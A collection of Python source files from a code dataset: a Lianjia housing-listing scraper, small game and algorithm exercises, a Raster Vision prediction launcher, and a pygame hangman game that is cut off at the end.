'全球通'])\nplt.show()\n","sub_path":"lab_data_analysis/lab38_02.py","file_name":"lab38_02.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
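A minimal sketch of the grouped-bar technique from lab38_02.py above (reviewer illustration with made-up data): each series is drawn at index + k*width, and the tick labels are shifted into the middle of each group.

import numpy as np
from matplotlib import pyplot as plt

index = np.arange(3)          # one slot per category
width = 1 / 4                 # three bars plus a gap per slot
series = {'A': [5, 3, 4], 'B': [2, 6, 1], 'C': [4, 4, 5]}

for k, (name, values) in enumerate(series.items()):
    # shift each series right by k bar-widths so the bars sit side by side
    plt.bar(index + k * width, values, width=width, label=name)

plt.xticks(index + width, ['cat1', 'cat2', 'cat3'])  # centre labels on the middle bar
plt.legend()
plt.show()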
+{"seq_id":"62826081","text":"#依赖第三方库:\n#Selenium(自动化测试工具), requests(http请求工具), BeautifulSoup(解析网页的工具),pandas()\nimport os\nfrom selenium import webdriver\nimport requests\nfrom bs4 import BeautifulSoup\nimport re\nfrom itertools import islice\nfrom collections import OrderedDict\nimport pandas as pd\nimport time\nimport functools\n\n\nCommunities_Info_Col = [u'小区名称', u'大区域', u'小区域', u'建造时间', u'挂牌均价', u'在售套数', u'链接']\nProperties_Info_Col = ['小区名字', '大区域', '小区域', '建造时间', '单价','房型', '面积', '楼层', '朝向',\n '价格', '描述', '地铁', '满五', '有钥匙', '新上', '链接']\nTransitions_Info_Col = ['小区名字', '大区域', '小区域', '价格','交易时间','面积','房型', '单价', '楼层',\n '朝向', '装修', '链接']\nHome_url = u\"http://sh.lianjia.com\"\nLianjia_Account = 'your account'\nLianjia_Password = 'your password'\nCookies = None\nReq = None\n\n\ndef stop_time(f):\n @functools.wraps(f)\n def wrapper(*args, **kwargs):\n start = time.time()\n res = f(*args, **kwargs)\n print('%s execute %s s ' % (f, time.time()-start))\n return res\n return wrapper\n\n\n@stop_time\ndef login():\n chrome_path= r\"C:\\Program Files (x86)\\chromedriver_win32\\chromedriver.exe\"\n wd = webdriver.Chrome(executable_path=chrome_path)\n login_url = 'http://passport.lianjia.com/cas/login?service=http%3A%2F%2Fuser.sh.lianjia.com%2Findex'\n wd.get(login_url)\n\n wd.find_element_by_xpath('//*[@id=\"username\"]').send_keys(Lianjia_Account)\n wd.find_element_by_xpath('//*[@id=\"password\"]').send_keys(Lianjia_Password)\n wd.find_element_by_xpath('//*[@id=\"loginUserForm\"]/ul/li[5]/button').click()\n\n req = requests.Session() #构建Session\n global Cookies\n Cookies = wd.get_cookies() #导出cookie\n\n\ndef get_req():\n global Req\n global Cookies\n if Req:\n return Req\n Req = requests.Session() # 构建Session\n for cookie in Cookies:\n Req.cookies.set(cookie['name'], cookie['value']) # 转换cookies\n return Req\n\n\ndef do_request(url):\n req = get_req()\n for i in range(5):\n try:\n res = req.get(url)\n except (ConnectionResetError, requests.exceptions.ConnectionError):\n print('open %s failed and try %sth in 5s' % (url, i+2))\n time.sleep(5)\n else:\n break\n return res\n\n\n@stop_time\ndef district_spider():\n url = u\"/xiaoqu/\"\n plain_text = do_request(Home_url + url).text\n soup = BeautifulSoup(plain_text, 'lxml')\n area_tags = soup.find('div', {'class': 'option-list gio_district'}).findAll('a')\n big_areas = OrderedDict()\n for i in islice(area_tags, 1, len(area_tags) - 1):\n href = i.get('href')\n href = href[href.rfind('/', 0, len(href) - 1) + 1:-1]\n big_areas[href] = list()\n big_areas[href].append(i.text)\n\n plain_text = do_request(Home_url + url + href).text\n sub_area_soup = BeautifulSoup(plain_text, 'lxml')\n sub_area_tags = sub_area_soup.find('div', {'class': 'option-list sub-option-list gio_plate'}).findAll('a')\n for j in islice(sub_area_tags, 1, len(sub_area_tags)):\n sub_href = j.get('href')\n sub_href = sub_href[sub_href.rfind('/', 0, len(sub_href)-1)+1:-1]\n big_areas[href].append((sub_href, j.text))\n return big_areas\n\n\ndef xiaoqu_spider(url_page):\n \"\"\"\n 爬取页面链接中的小区信息\n \"\"\"\n #try:\n #print('search %s' % url_page)\n plain_text = do_request(url_page).text\n soup = BeautifulSoup(plain_text, 'lxml')\n # except (urllib2.HTTPError, urllib2.URLError) as e:\n\n xiaoqu_list = soup.findAll('div', {'class': 'info-panel'})\n community_list = list()\n for xq in xiaoqu_list:\n community_info = list()\n community_info.append(xq.find('a').text)\n area_tag = xq.find('div', {'class': 'con'})\n area = area_tag.findAll('a')\n\n community_info.append(area[0].text)\n 
community_info.append(area[1].text)\n area_content = area_tag.text\n pattern = re.compile(r'\\s+')\n area_content = re.sub(pattern, '', area_content)\n info = re.match(r'.*|(.*)年建成', area_content)\n if info:\n community_info.append(int(info.groups()[0][-4:]))\n else:\n community_info.append(info)\n\n price = xq.find('div', {'class': 'price'}).span.text.strip()\n price = int(price) if price.isdigit() else None\n stock_num = int(xq.find('div', {'class': 'square'}).a.span.text.strip())\n href = xq.find('div', {'class': 'square'}).a.get('href')\n\n community_info.append(price)\n community_info.append(stock_num)\n community_info.append(href)\n community_list.append(community_info)\n return community_list\n\n\n@stop_time\ndef do_xiaoqu_spider(big_areas):\n \"\"\"\n 爬取大区域中的所有小区信息\n \"\"\"\n xiaoqu_url = u'/xiaoqu/'\n #查找大区域\n results = list()\n for area in big_areas.values():\n for sub_area in islice(area, 1, len(area)):\n url = Home_url+xiaoqu_url+sub_area[0]\n\n plain_text = do_request(url).text\n soup = BeautifulSoup(plain_text, 'lxml')\n page_div = soup.find('div', {'class': 'page-box house-lst-page-box'})\n total_pages = page_div.find('a', {'gahref': 'results_totalpage'})\n if total_pages:\n total_pages = int(total_pages.text)\n else:\n page_a_num = len(page_div.findAll('a'))\n total_pages = page_a_num - 1 if page_a_num > 2 else page_a_num\n\n for i in range(total_pages):\n url_page = url + u\"/d%s\" % (i + 1)\n results.extend(xiaoqu_spider(url_page))\n print('current communities %s %s %s' % (len(results), area[0], sub_area[1]))\n #process_pool.join()\n return results\n\ndef property_spider(url_page):\n \"\"\"\n 爬取页面链接中的二手房信息\n \"\"\"\n #try:\n #print('search %s' % url_page)\n plain_text = do_request(url_page).text\n soup = BeautifulSoup(plain_text, 'lxml')\n # except (urllib2.HTTPError, urllib2.URLError) as e:\n\n xiaoqu_list = soup.findAll('div', {'class': 'info'})\n property_list = list()\n for prop in xiaoqu_list:\n\n property_info = list()\n try:\n row2 = prop.find('span', {'class':'info-col row2-text'})\n name = row2.findAll('a')\n property_info.append(name[0].text)#小区名字\n property_info.append(name[1].text) # 大区域\n property_info.append(name[2].text) # 小区域\n year = re.findall('(\\d+)年', row2.text)\n property_info.append(year[0] if year else None) #建造时间\n price_item = prop.find('span', {'class': 'info-col price-item minor'})\n price_item = re.findall('(\\d+)', price_item.text) if price_item else None\n property_info.append(price_item[0] if price_item else None) # 单价\n row1 = prop.find('span', {'class': 'info-col row1-text'})\n row1_info = re.match('\\s+(.+)\\|(.+)平\\s+\\|(.+)\\s+\\|?(.*)\\s+', row1.text)\n if not row1_info:\n print(row1.text)\n raise\n row1_info = row1_info.groups()\n property_info.append(row1_info[0])#房型\n property_info.append(row1_info[1]) # 面积\n property_info.append(row1_info[2]) # 楼层\n property_info.append(row1_info[3]) # 朝向\n\n total_price = prop.find('span', {'class': 'total-price strong-num'}).text\n property_info.append(total_price) # 价格\n\n des = prop.find('a', {'class': 'text link-hover-green js_triggerGray js_fanglist_title'})\n property_info.append(des.text) # 描述\n\n tag2s = prop.find('div', {'class': 'property-tag-container'}).findAll('span')\n str_other = ''\n for tag in tag2s:\n str_other += tag.text\n re_res = re.search(r'距离.*米', str_other)\n property_info.append(re_res.group() if re_res else None)#地铁\n\n re_res = re.search(r'满(五|二)', str_other)\n property_info.append(re_res.group() if re_res else None)#满五\n\n re_res = re.search(r'有钥匙', str_other)\n 
property_info.append(re_res.group() if re_res else None)#有钥匙\n\n new = prop.find('span', {'class': 'c-prop-tag c-prop-tag--blue'})\n a = 1\n property_info.append(1 if new else None)#新上\n property_info.append(des.get('href'))#链接\n except IndexError:\n raise IndexError\n property_list.append(property_info)\n return property_list\n\n\n@stop_time\ndef do_property_spider(big_areas, start=0):\n \"\"\"\n 爬取所有二手房信息\n \"\"\"\n xiaoqu_url = u'/ershoufang/'\n #查找大区域\n results = list()\n for area in islice(big_areas.values(), start, len(big_areas)):\n for sub_area in islice(area, 1, len(area)):\n url = Home_url+xiaoqu_url+sub_area[0]\n\n plain_text = do_request(url).text\n soup = BeautifulSoup(plain_text, 'lxml')\n page_div = soup.find('div', {'class': 'c-pagination'})\n if not page_div:\n print('not find page %s %s' % (area[0], sub_area[0]))\n continue\n total_pages = page_div.find('a', {'gahref': 'results_totalpage'})\n if total_pages:\n total_pages = int(total_pages.text)\n else:\n page_a_num = len(page_div.findAll('a'))\n total_pages = page_a_num - 1 if page_a_num > 2 else page_a_num\n\n for i in range(total_pages):\n url_page = url + u\"/d%s\" % (i + 1)\n results.extend(property_spider(url_page))\n #if len(results) > 100:\n #return results\n\n print('current properties %s %s %s' % (len(results), area[0], sub_area[1]))\n #process_pool.join()\n return results\n\n\ndef trans_spider(url_page):\n \"\"\"\n 爬取页面链接中的交易信息\n \"\"\"\n #try:\n #print('search %s' % url_page)\n plain_text = do_request(url_page).text\n soup = BeautifulSoup(plain_text, 'lxml')\n # except (urllib2.HTTPError, urllib2.URLError) as e:\n\n transactions = soup.findAll('div', {'class': 'info'})\n tran_list = list()\n for tran in transactions:\n\n tran_info = list()\n try:\n trade_time = tran.find('div', {'class':'info-col deal-item main strong-num'}).text\n price = tran.find('div', {'class':'info-col price-item main'}).find('span', {'class':'strong-num'})\n price = price.text\n district_tag = tran.find('span', {'class':'row2-text'}).findAll('a')\n sub_district = district_tag[1].text\n district = district_tag[0].text\n row = tran.find('div', {'class': 'info-row'})\n xiaoqu = row.find('span', {'class': 'cj-text'}).text\n area = re.findall(' (.*)平', row.text)[0]\n room_type = re.findall('\\s+(.+室.+厅) ', row.text)[0]\n unit_price = tran.find('div', {'class':'info-col price-item minor'}).text\n unit_price = re.findall('\\d+', unit_price)[0]\n info = re.match('\\s+(.+)\\s+\\|?(.*)\\s+\\|?(.*)', tran.find('div', {'class': 'row1-text'}).text).groups()\n floor = info[0]\n aspect = info[1]\n decoration = info[2]\n\n href = tran.find('a', {'class': 'info-col text link-hover-green'}).get('href')\n\n #'小区名字', '大区域', '小区域', '价格','交易时间','面积','房型', '单价', '楼层', '朝向', '装修', 链接'\n tran_info.append(xiaoqu)\n tran_info.append(district)\n tran_info.append(sub_district)\n tran_info.append(price)\n tran_info.append(trade_time)\n tran_info.append(area)\n tran_info.append(room_type)\n tran_info.append(unit_price)\n tran_info.append(floor)\n tran_info.append(aspect)\n tran_info.append(decoration)\n tran_info.append(href)\n\n except (IndexError, AttributeError):\n print(url_page)\n print(tran.text)\n raise IndexError\n tran_list.append(tran_info)\n return tran_list\n\n\n@stop_time\ndef do_trans_spider(big_areas, start=0):\n \"\"\"\n 爬取所有交易信息\n \"\"\"\n xiaoqu_url = u'/chengjiao/'\n #查找大区域\n results = list()\n for area in islice(big_areas.values(), start, len(big_areas)):\n for sub_area in islice(area, 1, len(area)):\n url = Home_url+xiaoqu_url+sub_area[0]\n\n 
plain_text = do_request(url).text\n soup = BeautifulSoup(plain_text, 'lxml')\n page_div = soup.find('div', {'class': 'c-pagination'})\n if not page_div:\n print('not find page %s %s' % (area[0], sub_area[0]))\n continue\n total_pages = page_div.find('a', {'gahref': 'results_totalpage'})\n if total_pages:\n total_pages = int(total_pages.text)\n else:\n page_a_num = len(page_div.findAll('a'))\n total_pages = page_a_num - 1 if page_a_num > 2 else page_a_num\n\n for i in range(total_pages):\n url_page = url + u\"/d%s\" % (i + 1)\n results.extend(trans_spider(url_page))\n #if len(results) > 100:\n #return results\n\n print('current transition %s %s %s' % (len(results), area[0], sub_area[1]))\n\n return results\n\n\nif __name__ == '__main__':\n login()\n districts = district_spider()\n\n btrans = True\n bstock = True\n bcommunity = True\n # 成交\n if btrans:\n transitions = do_trans_spider(districts)\n df_transitions = pd.DataFrame(transitions, columns=Transitions_Info_Col)\n df_transitions.to_csv('transitions_%s.csv' % time.strftime(\"%Y_%m_%d_%H_%M_%S\", time.localtime()))\n\n #在售\n if bstock:\n properties = do_property_spider(districts)\n df_properties = pd.DataFrame(properties, columns=Properties_Info_Col)\n df_properties.to_csv('properties_%s.csv' % time.strftime(\"%Y_%m_%d_%H_%M_%S\", time.localtime()))\n\n #小区\n if bcommunity:\n communities = do_xiaoqu_spider(districts)\n df_communities = pd.DataFrame(communities, columns=Communities_Info_Col)\n df_communities.to_csv('communities_%s.csv' % time.strftime(\"%Y_%m_%d_%H_%M_%S\", time.localtime()))\n\n\n","sub_path":"spider4lianjia.py","file_name":"spider4lianjia.py","file_ext":"py","file_size_in_byte":14640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"640435219","text":"def minimax(arr, depth):\r\n if depth == 1:\r\n return print(arr[0])\r\n else:\r\n winners = []\r\n\r\n if depth % 2 == 0:\r\n for i in range(0, len(arr), 2):\r\n winners.append(max(arr[i], arr[i + 1]))\r\n else:\r\n for i in range(0, len(arr), 2):\r\n winners.append(min(arr[i], arr[i + 1]))\r\n\r\n depth -= 1\r\n minimax(winners, depth)\r\n","sub_path":"minimax.py","file_name":"minimax.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"334094319","text":"# coding:utf-8\n\n\nimport threadpool, time, os\nfrom multiprocessing import cpu_count\n\nall_line_dict = {}\n\nwith open('/home/wangxiaopeng/replaced_220341_tags.dat') as fr:\n for line in fr.readlines():\n a = set()\n pic_labels = line.strip().split('__^__')\n for label in pic_labels[1].strip().split(' '):\n if len(label) > 0:\n a.add(label)\n all_line_dict[pic_labels[0]] = a\n\nkey_list = all_line_dict.keys()\n\n\ndef write_files(i):\n print ('start write:', i, '..........')\n\n fw = open('/home/wangxiaopeng/operate/mid_files/' + str(i) + '_mid_file.txt', 'w')\n i_key = key_list[i]\n i_set = all_line_dict[i_key]\n for j in key_list[i + 1:]:\n j_set = all_line_dict[j]\n if len(j_set.intersection(i_set)) == 0:\n fw.write(i_key + ' ' + j + '\\n')\n fw.flush()\n fw.close()\n print ('save :', i, 'over !!!!!!!!!!!!')\n\n\nif __name__ == '__main__':#GPU 机器写到了第18138和剩余的图片比较所得的交集,下次该 i = 18139 !!!!\n\n i_list = [[i] for i in range(0, len(key_list))]\n\n n_list = [None for i in range(len(i_list))]\n\n pool = threadpool.ThreadPool(cpu_count())\n requests = threadpool.makeRequests(write_files, zip(i_list, n_list))\n [pool.putRequest(req) for req in requests]\n pool.wait()\n print 
('all of intersection processes execute over !!!!!')\n","sub_path":"tagsquantify/cnn/intersect_0.py","file_name":"intersect_0.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
+{"seq_id":"444029499","text":"# A simple logic exercise: rock, paper, scissors examples using loops \n# (and nested conditionals)\n\ndef paperRockScissors():\n # I would say that this is a longer way than most other ways, but \n # it shows exactly what's happening at every step of the way \n # and it is kind of dummy proof\n\n print(\"Your choices are: \\nrock\\npaper\\nscissors\")\n player1 = input(\"(enter Player 1's choice): \").lower()\n for i in range (20):\n print(\" NO CHEATING \")\n player2 = input(\"(enter Player 2's choice): \").lower() # the call parentheses are needed so the lowered string, not the method object, is stored\n print(\"SHOOT!\")\n\n # Checks if player 1 entered a correct value for the game\n if player1 == \"rock\" or player1 == \"paper\" or player1 == \"scissors\":\n # Checks if player 2 entered a correct value for the game\n if player2 == \"rock\" or player2 == \"paper\" or player2 == \"scissors\":\n # Checks if they tied first.\n if player1 == player2:\n print(\"you tied! Try again\")\n return\n # Logically, it makes sense to me that you would put everything else inside...an else.\n else:\n if player1 == \"scissors\":\n if player2 == \"rock\":\n print(\"player 2 wins!\")\n return\n else:\n print(\"player 1 wins!\")\n return\n elif player1 == \"paper\":\n if player2 == \"scissors\":\n print(\"player 2 wins!\")\n return\n else:\n print(\"player 1 wins!\")\n return\n elif player1 == \"rock\":\n if player2 == \"paper\":\n print(\"player 2 wins!\")\n return\n else:\n print(\"player 1 wins!\")\n return\n else:\n print(\"player 2 entered an invalid option, try again\")\n return\n else:\n print(\"player 1 entered an invalid option, try again\")\n return\n \ndef paperRockScissorsShort():\n # This is probably one of the shortest ways to do this, but\n # you're mostly just going to be hoping the users don't enter something\n # that shouldn't be there. I.E. \"Pikachu\"\n # Yes, pikachu probably beats paper, and loses to rock and maybe scissors?\n\n p1 = input(\"Player 1: rock, paper, or scissors \")\n p2 = input(\"Player 2: rock, paper, or scissors \")\n \n # Checks p1 against p2 every time and if p1 doesn't win in any of these conditionals,\n # it must mean that p2 is the winner...right? It's kind of an honor system.\n if p1 == p2:\n print(\"Draw\")\n elif p1 == \"rock\" and p2 == \"scissors\":\n print(\"p1 wins\")\n elif p1 == \"paper\" and p2 == \"rock\":\n print(\"p1 wins\")\n elif p1 == \"scissors\" and p2 == \"paper\":\n print(\"p1 wins\")\n else:\n print(\"p2 wins\")\n\ndef computerVsMan():\n import random\n # And finally, it's time for the final showdown of man vs machine.\n # Unfortunately, it's a rock, paper, scissors fight to the end.\n # Good luck. 
\n # This is using the same code from the first iteration, with random import.\n\n print(\"Your choices are: \\nrock\\npaper\\nscissors\\n\")\n print(\"The robot awaits...\\n\")\n player1 = input(\"enter your choice: \").lower()\n\n player2 = random.choice([\"rock\", \"paper\", \"scissors\"])\n\n print(\"SHOOT!\")\n print(f\"The robot chose {player2}\\n\")\n\n # Checks if player 1 entered a correct value for the game\n if player1 == \"rock\" or player1 == \"paper\" or player1 == \"scissors\":\n # Checks if player 2 entered a correct value for the game\n if player2 == \"rock\" or player2 == \"paper\" or player2 == \"scissors\":\n # Checks if they tied first.\n if player1 == player2:\n print(\"you tied! Try again to save humanity\")\n return\n # Logically, it makes sense to me that you would put everything else inside...an else.\n else:\n if player1 == \"scissors\":\n if player2 == \"rock\":\n print(\"robot wins!\")\n return\n else:\n print(\"player 1 wins!\")\n return\n elif player1 == \"paper\":\n if player2 == \"scissors\":\n print(\"robot wins!\")\n return\n else:\n print(\"player 1 wins!\")\n return\n elif player1 == \"rock\":\n if player2 == \"paper\":\n print(\"robot wins!\")\n return\n else:\n print(\"player 1 wins!\")\n return\n else:\n print(\"player 1 entered an invalid option, try again\")\n return\n\n# paperRockScissors()\n# paperRockScissorsShort()\ncomputerVsMan()","sub_path":"rock_paper_scissor.py","file_name":"rock_paper_scissor.py","file_ext":"py","file_size_in_byte":5018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"405101250","text":"import logging\n\nlog = logging.getLogger(__package__)\nhandler = logging.StreamHandler()\n\nformatter = logging.Formatter(\n fmt='[%(name)s] [%(threadName)s] %(asctime)s %(levelname)s %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S'\n)\nhandler.setFormatter(formatter)\nlog.addHandler(handler)\n\n\ndef enable_debug():\n log.setLevel(logging.DEBUG)\n\n\n# enable_debug()\n","sub_path":"log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"263417974","text":"import json\nimport os\n\nfrom rv.utils.files import (\n download_if_needed, MyTemporaryDirectory)\nfrom rv.utils.batch import _batch_submit\nfrom rv.detection.commands.settings import temp_root_dir\n\n\ndef make_predict_array_cmd(inference_graph_uri, label_map_uri, projects_uri):\n return 'python -m rv.detection.run predict_array {} {} {}'.format(\n inference_graph_uri, label_map_uri, projects_uri)\n\n\ndef make_merge_predictions_cmd(projects_uri, output_uri):\n return 'python -m rv.detection.run merge_predictions {} {}'.format(\n projects_uri, output_uri)\n\n\ndef parallel_predict():\n inference_graph_uri = \\\n 's3://raster-vision-lf-dev/detection/trained-models/cowc-potsdam/30cm/inference-graph.pb'\n label_map_uri = \\\n 's3://raster-vision-lf-dev/detection/configs/label-maps/cowc.pbtxt'\n projects_uri = \\\n 's3://raster-vision-lf-dev/detection/configs/projects/predict/cowc-potsdam/remote/30cm-test.json'\n output_uri = \\\n 's3://raster-vision-lf-dev/detection/predictions/cowc-potsdam/30cm-test/all.json'\n\n branch_name = 'lf/rfint'\n attempts = 1\n cpu = True\n\n prefix = temp_root_dir\n temp_dir = os.path.join(prefix, 'parallel-predict')\n with MyTemporaryDirectory(temp_dir, prefix) as temp_dir:\n projects_path = download_if_needed(projects_uri, temp_dir)\n with open(projects_path, 'r') as projects_file:\n 
projects = json.load(projects_file)\n nb_projects = len(projects)\n command = make_predict_array_cmd(\n inference_graph_uri, label_map_uri, projects_uri)\n predict_job_id = _batch_submit(\n branch_name, command, attempts=attempts, cpu=cpu,\n array_size=nb_projects)\n\n command = make_merge_predictions_cmd(\n projects_uri, output_uri)\n _batch_submit(\n branch_name, command, attempts=attempts, cpu=cpu,\n parent_job_ids=[predict_job_id])\n\n\nif __name__ == '__main__':\n parallel_predict()\n","sub_path":"src/workflows/detection/cowc_potsdam/parallel_predict.py","file_name":"parallel_predict.py","file_ext":"py","file_size_in_byte":2004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"569287824","text":"import os\n\nimport web\n\ntry:\n import pygame\nexcept ImportError:\n os.system('pip install pygame')\nimport string\nimport sys\nimport webbrowser\n\nfrom web import *\nfrom hangman import *\nfrom tkinter import *\nfrom tkinter.filedialog import *\n\n\nLIGHT_GREY = (214, 195, 191)\nGREY = (122, 117, 116)\nLIGHT_BLACK = (41, 36, 35)\nDARK_BLUE = (10, 7, 61)\nDARK_GREEN = (0, 28, 9)\nORANGE_RED = (179, 36, 7)\nWHITE = (255, 255, 255)\nGREEN =(38, 156, 14)\nRED = (255, 0, 0)\nBG_COLOUR = (213, 221, 232)\nBLACK = (0,0,0)\npygame.init()\nFONT_80 = pygame.font.SysFont(None, 80)\nFONT_200 = pygame.font.SysFont(None, 200)\nFONT_60 = pygame.font.SysFont(None, 60)\nFONT_70 = pygame.font.SysFont(None, 70)\nFONT_100 = pygame.font.SysFont(None, 100)\nFONT_180 = pygame.font.SysFont(None, 180)\nFONT_30 = pygame.font.SysFont(None, 30)\n\n\nscreen = pygame.display.set_mode([1280, 720])\npygame.display.set_caption('HANGMAN')\nicon = pygame.image.load(\"assets/Hangman.ico\")\npygame.display.set_icon(icon)\n\ndef word_enter():\n showError = False\n def start(text):\n if len(text) >60:\n\n label2.config(text=\"Too long\")\n label2.pack(anchor='center')\n return False\n if all([True if i in Hangman.allowed else False for i in text]) and any([True if i in string.ascii_letters else False for i in text]):\n root.destroy()\n main_window(text)\n else:\n label2.config(text=\"Choose a different word\")\n label2.pack(anchor='center')\n \n root = Tk()\n root.title(\"Word Select\")\n root.geometry(\"150x100\")\n root.resizable(False, False)\n\n label = Label(root, text=\"Type a Word/Phrase\")\n label2 = Label(root)\n entry = Entry(root)\n button = Button(root, text=\"Start\",command = lambda: start(entry.get()))\n\n\n label.pack(anchor='n')\n entry.pack(anchor='n')\n button.pack(anchor='center')\n root.mainloop()\n\n\ndef main_window(text=None, dict_name = None):\n greyarr = [[40, 200, 80, 80], [140, 200, 80, 80], [240, 200, 80, 80], [340, 200, 80, 80], [440, 200, 80, 80],\n [540, 200, 80, 80], [40, 300, 80, 80], [140, 300, 80, 80], [240, 300, 80, 80], [340, 300, 80, 80],\n [440, 300, 80, 80], [540, 300, 80, 80], [40, 400, 80, 80], [140, 400, 80, 80], [240, 400, 80, 80],\n [340, 400, 80, 80], [440, 400, 80, 80], [540, 400, 80, 80], [40, 500, 80, 80], [140, 500, 80, 80],\n [240, 500, 80, 80], [340, 500, 80, 80], [440, 500, 80, 80], [540, 500, 80, 80], [40, 600, 80, 80],\n [140, 600, 80, 80]]\n color1arr = [[45, 205, 70, 70], [145, 205, 70, 70], [245, 205, 70, 70], [345, 205, 70, 70], [445, 205, 70, 70],\n [545, 205, 70, 70], [45, 305, 70, 70], [145, 305, 70, 70], [245, 305, 70, 70], [345, 305, 70, 70],\n [445, 305, 70, 70], [545, 305, 70, 70], [45, 405, 70, 70], [145, 405, 70, 70], [245, 405, 70, 70],\n [345, 405, 70, 70], [445, 405, 70, 70], [545, 405, 70, 70], [45, 
505, 70, 70], [145, 505, 70, 70],\n [245, 505, 70, 70], [345, 505, 70, 70], [445, 505, 70, 70], [545, 505, 70, 70], [45, 605, 70, 70],\n [145, 605, 70, 70]]\n textarr = [(60, 215), (160, 215), (260, 215), (360, 215), (460, 215), (560, 215), (60, 315), (160, 315), (270, 315),\n (360, 315), (460, 315), (560, 315), (60, 415), (160, 415), (260, 415), (360, 415), (460, 415),\n (560, 415), (60, 515), (160, 515), (260, 515), (360, 515), (455, 515), (560, 515), (60, 615), (164, 615)]\n bounds = [[40, 200, 120, 280], [140, 200, 220, 280], [240, 200, 320, 280], [340, 200, 420, 280],\n [440, 200, 520, 280], [540, 200, 620, 280], [40, 300, 120, 380], [140, 300, 220, 380],\n [240, 300, 320, 380], [340, 300, 420, 380], [440, 300, 520, 380], [540, 300, 620, 380],\n [40, 400, 120, 480], [140, 400, 220, 480], [240, 400, 320, 480], [340, 400, 420, 480],\n [440, 400, 520, 480], [540, 400, 620, 480], [40, 500, 120, 580], [140, 500, 220, 580],\n [240, 500, 320, 580], [340, 500, 420, 580], [440, 500, 520, 580], [540, 500, 620, 580],\n [40, 600, 120, 680], [140, 600, 220, 680]]\n\n alphabet = string.ascii_uppercase\n running = True\n if text:\n game = Hangman(string=text)\n else:\n game = Hangman(dictionary=dict_name)\n hint_used = False\n while running:\n mx, my = pygame.mouse.get_pos()\n\n if len(game.guess_wrong) >= 10:\n running = False\n loss_screen(game)\n\n if game.check_win():\n running = False\n win_screen(game)\n\n\n curLetters = list(alphabet)\n\n screen.fill(BG_COLOUR)\n\n try:\n image = pygame.image.load(f'assets/{len(game.guess_wrong)}.png')\n screen.blit(image, (800,100))\n except FileNotFoundError:\n pass\n\n\n if len(game.dis) <=30:\n toGuess = FONT_70.render(\"\".join(i + \" \" for i in game.dis), True, LIGHT_BLACK)\n screen.blit(toGuess, (20, 20))\n elif len(game.dis) >30 and len(game.dis) <=60:\n if game.string[30]!=\" \" and game.string[29]!=\" \":\n msg = \"\".join(i + \" \" for i in game.dis[:30])+\"-\"\n else:\n msg = \"\".join(i + \" \" for i in game.dis[:30])\n toGuess = FONT_70.render(msg, True, LIGHT_BLACK)\n screen.blit(toGuess, (20, 20))\n\n msg = \"\".join(i + \" \" for i in game.dis[30:])\n toGuess = FONT_70.render(msg, True, LIGHT_BLACK)\n screen.blit(toGuess, (20, 100))\n\n left = FONT_180.render(str(10 - len(game.guess_wrong)), True, LIGHT_BLACK)\n screen.blit(left, (1120, 580))\n\n guessesLeft = FONT_80.render(\"Guesses Left:\", True, LIGHT_BLACK)\n screen.blit(guessesLeft, (740, 620))\n\n for i in range(len(greyarr)):\n pygame.draw.rect(screen, GREY, greyarr[i])\n pygame.draw.rect(screen, LIGHT_GREY, color1arr[i])\n img = FONT_80.render(curLetters[0], True, LIGHT_BLACK)\n\n curLetters.pop(0)\n screen.blit(img, textarr[i])\n\n\n if not hint_used:\n hint = pygame.Rect([450,600,160,80])\n pygame.draw.rect(screen, GREY, hint)\n pygame.draw.rect(screen, LIGHT_GREY, [455,605,150,70])\n img = FONT_70.render(\"HINT\", True, BLACK)\n screen.blit(img, (470,615))\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n running = False\n if event.type == pygame.MOUSEBUTTONDOWN:\n\n if hint.collidepoint((mx,my)) and not hint_used:\n hint_used = True\n index = alphabet.find(game.hint())\n greyarr.pop(index)\n color1arr.pop(index)\n textarr.pop(index)\n bounds.pop(index)\n alphabet = alphabet[:index] + alphabet[index + 1:]\n\n for index, bound in enumerate(bounds):\n if mx >= bound[0] and mx <= bound[2] and my >= bound[1] and my <= bound[3]:\n game.checkLetter(alphabet[index])\n\n greyarr.pop(index)\n color1arr.pop(index)\n textarr.pop(index)\n bounds.pop(index)\n 
alphabet = alphabet[:index] + alphabet[index + 1:]\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n main_menu()\n\n pygame.display.update()\n\n\ndef dictSelect():\n root =Tk()\n root.withdraw()\n name = dict_name=askopenfilename()\n root.destroy()\n if name and name != \"()\":\n main_window(dict_name=name)\n else:\n main_menu()\n\n\ndef loss_screen(game_obj):\n\n running = True\n while running:\n mx, my = pygame.mouse.get_pos()\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n running = False\n if event.type == pygame.MOUSEBUTTONDOWN:\n if back.collidepoint((mx, my)):\n running = False\n main_menu()\n screen.fill(BG_COLOUR)\n\n img = FONT_180.render(\"You Lost!\", True, RED)\n screen.blit(img, (350,50))\n\n text = \"The word was:\"\n img = FONT_70.render(text, True, LIGHT_BLACK)\n location = img.get_rect(center=screen.get_rect().center)\n location.move_ip(0, -150)\n screen.blit(img, location)\n\n\n text = game_obj.string\n if len(text) <=30:\n img = FONT_70.render(text, True, LIGHT_BLACK)\n location = img.get_rect(center=screen.get_rect().center)\n location.move_ip(0, -100)\n screen.blit(img, location)\n\n elif len(text) >30 and len(text) <=60:\n if text[30]!=\" \" and text[29]!=\" \":\n img = FONT_70.render(text[:30]+'-', True, LIGHT_BLACK)\n location = img.get_rect(center=screen.get_rect().center)\n location.move_ip(0, -100)\n screen.blit(img, location)\n\n img = FONT_70.render(text[30:], True, LIGHT_BLACK)\n location = img.get_rect(center=screen.get_rect().center)\n location.move_ip(0, -30)\n 